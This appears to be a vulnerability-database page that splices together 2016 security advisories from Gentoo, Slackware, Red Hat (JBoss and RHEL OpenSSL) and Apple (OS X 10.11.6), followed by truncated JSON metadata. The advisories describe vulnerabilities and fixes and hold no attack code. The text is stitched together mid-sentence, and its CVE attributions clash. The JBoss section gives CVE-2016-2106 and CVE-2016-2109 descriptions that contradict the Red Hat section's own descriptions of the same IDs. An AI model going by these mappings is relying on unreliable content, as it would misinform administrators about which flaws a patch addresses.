Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 packages: 033bd9509aeb07712e6bb3adf89c18e4 openssl-1.0.1t-i486-1_slack14.0.txz 9e91d781e33f7af80cbad08b245e84ed openssl-solibs-1.0.1t-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: e5c77ec16e3f2fcb2f1d53d84a6ba951 openssl-1.0.1t-x86_64-1_slack14.0.txz 2de7b6196a905233036d7f38008984bd openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 96dcae05ae2f585c30de852a55eb870f openssl-1.0.1t-i486-1_slack14.1.txz 59618b061e62fd9d73ba17df7626b2e7 openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 3d5ebfce099917703d537ab603e58a9b openssl-1.0.1t-x86_64-1_slack14.1.txz bf3a6bbdbe835dd2ce73333822cc9f06 openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz
Slackware -current packages: 4889a10c5f3aa7104167c7d50eedf7ea a/openssl-solibs-1.0.2h-i586-1.txz 8e3439f35c3cb4e11ca64eebb238a52f n/openssl-1.0.2h-i586-1.txz
Slackware x86_64 -current packages: b4a852bb7e86389ec228288ccb7e79bb a/openssl-solibs-1.0.2h-x86_64-1.txz bcf9dc7bb04173f002644e3ce33ab4ab n/openssl-1.0.2h-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Then, reboot the machine or restart any network services that use OpenSSL.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
This release includes bug fixes and enhancements, as well as a new release of OpenSSL that addresses a number of outstanding security flaws. For further information, see the knowledge base article linked to in the References section. The JBoss server process must be restarted for the update to take effect. (CVE-2016-2108)
-
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3195)
-
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic. (CVE-2016-2106)
-
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-2109)
-
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:0722-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0722.html Issue date: 2016-05-09 CVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2842 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. An attacker could use this flaw to create a specially crafted certificate which, when verified or re-encoded by OpenSSL, could cause it to crash, or execute arbitrary code using the permissions of the user running an application compiled against the OpenSSL library. (CVE-2016-2108)
-
Two integer overflow flaws, leading to buffer overflows, were found in the way the EVP_EncodeUpdate() and EVP_EncryptUpdate() functions of OpenSSL parsed very large amounts of input data. (CVE-2016-2105, CVE-2016-2106)
-
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when the connection used the AES CBC cipher suite and the server supported AES-NI. A remote attacker could possibly use this flaw to retrieve plain text from encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)
-
Several flaws were found in the way BIO_*printf functions were implemented in OpenSSL. Applications which passed large amounts of untrusted data through these functions could crash or potentially execute code with the permissions of the user running such an application. (CVE-2016-0799, CVE-2016-2842)
-
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, and CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as the original reporter of CVE-2016-2107.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions 1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.5.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.5.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm openssl-devel-1.0.1e-51.el7_2.5.s390.rpm openssl-devel-1.0.1e-51.el7_2.5.s390x.rpm openssl-libs-1.0.1e-51.el7_2.5.s390.rpm openssl-libs-1.0.1e-51.el7_2.5.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.5.ppc64.rpm openssl-static-1.0.1e-51.el7_2.5.ppc.rpm openssl-static-1.0.1e-51.el7_2.5.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.5.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm openssl-perl-1.0.1e-51.el7_2.5.s390x.rpm openssl-static-1.0.1e-51.el7_2.5.s390.rpm openssl-static-1.0.1e-51.el7_2.5.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0799 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2107 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-2842 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXMFlTXlSAg2UNWIIRAhYAAJ0T9Ib2vXUa5te34i6fphHrbe0HlwCfePy5 WjaK8x9OaI0FgbWyfxvwq6o= =jHjh -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. 6.7) - i386, ppc64, s390x, x86_64
A security vulnerability in QEMU was addressed by HPE Helion OpenStack. The vulnerability could be exploited resulting in local unauthorized data access. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004
OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:
apache_mod_php
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later
Impact: A remote attacker may be able to execute arbitrary code
Description: Multiple issues existed in PHP versions prior to
5.5.36. These were addressed by updating PHP to version 5.5.36.
CVE-2016-4650
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read was addressed through improved input validation. CVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted audio file may lead to the disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-4646 : Steven Seeley of Source Incite working with Trend Micro's Zero Day Initiative
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
bsdiff Available for: OS X El Capitan v10.11 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow existed in bspatch. This issue was addressed through improved bounds checking. CVE-2014-9862 : an anonymous researcher
CFNetwork Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed through improved restrictions. CVE-2016-4645 : Abhinav Bansal of Zscaler Inc.
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
CoreGraphics Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to elevate privileges Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
FaceTime Available for: OS X El Capitan v10.11 and later Impact: An attacker in a privileged network position may be able to cause a relayed call to continue transmitting audio while appearing as if the call terminated Description: User interface inconsistencies existed in the handling of relayed calls. These issues were addressed through improved FaceTime display logic. CVE-2016-4635 : Martin Vigo
Graphics Drivers Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4634 : Stefan Esser of SektionEins
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2016-4632 : Evgeny Sidorov of Yandex
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports) CVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
Intel Graphics Driver Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4633 : an anonymous researcher
IOHIDFamily Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4626 : Stefan Esser of SektionEins
IOSurface Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A use-after-free was addressed through improved memory management. CVE-2016-4625 : Ian Beer of Google Project Zero
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1863 : Ian Beer of Google Project Zero CVE-2016-1864 : Ju Zhu of Trend Micro CVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent
libc++abi Available for: OS X El Capitan v10.11 and later Impact: An application may be able to execute arbitrary code with root privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4621 : an anonymous researcher
libexpat Available for: OS X El Capitan v10.11 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-0718 : Gustavo Grieco
LibreSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in LibreSSL before 2.2.7. These were addressed by updating LibreSSL to version 2.2.7. CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand, Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An access issue existed in the parsing of maliciously crafted XML files. This issue was addressed through improved input validation. CVE-2016-4449 : Kostya Serebryany
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxml2 Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4448 : Apple CVE-2016-4483 : Gustavo Grieco CVE-2016-4614 : Nick Wellnhofe CVE-2016-4615 : Nick Wellnhofer CVE-2016-4616 : Michael Paddon CVE-2016-4619 : Hanno Boeck
libxslt Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1684 : Nicolas GrA(c)goire CVE-2016-4607 : Nick Wellnhofer CVE-2016-4608 : Nicolas GrA(c)goire CVE-2016-4609 : Nick Wellnhofer CVE-2016-4610 : Nick Wellnhofer CVE-2016-4612 : Nicolas GrA(c)goire
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to compromise of user information Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to the compromise of user information Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a denial of service Description: A memory initialization issue was addressed through improved memory handling. CVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
OpenSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. CVE-2016-2105 : Guido Vranken CVE-2016-2106 : Guido Vranken CVE-2016-2107 : Juraj Somorovsky CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter CVE-2016-2176 : Guido Vranken
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4596 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4597 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4600 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4602 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4598 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted SGI file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4601 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4599 : Ke Liu of Tencent's Xuanwu Lab
Safari Login AutoFill Available for: OS X El Capitan v10.11 and later Impact: A user's password may be visible on screen Description: An issue existed in Safari's password auto-fill. This issue was addressed through improved matching of form fields. CVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD
Sandbox Profiles Available for: OS X El Capitan v10.11 and later Impact: A local application may be able to access the process list Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-2016-4594 : Stefan Esser of SektionEins
Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900
OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y +cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy pSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV xj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u wevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN ZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k ah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk mmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC JM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc 55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs xPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5 YozOGPQFmX0OviWCQsX6 =ng+m -----END PGP SIGNATURE----- .
The References section of this erratum contains a download link (you must log in to download the update)
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201605-0078", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.4.1" }, { "model": "android", 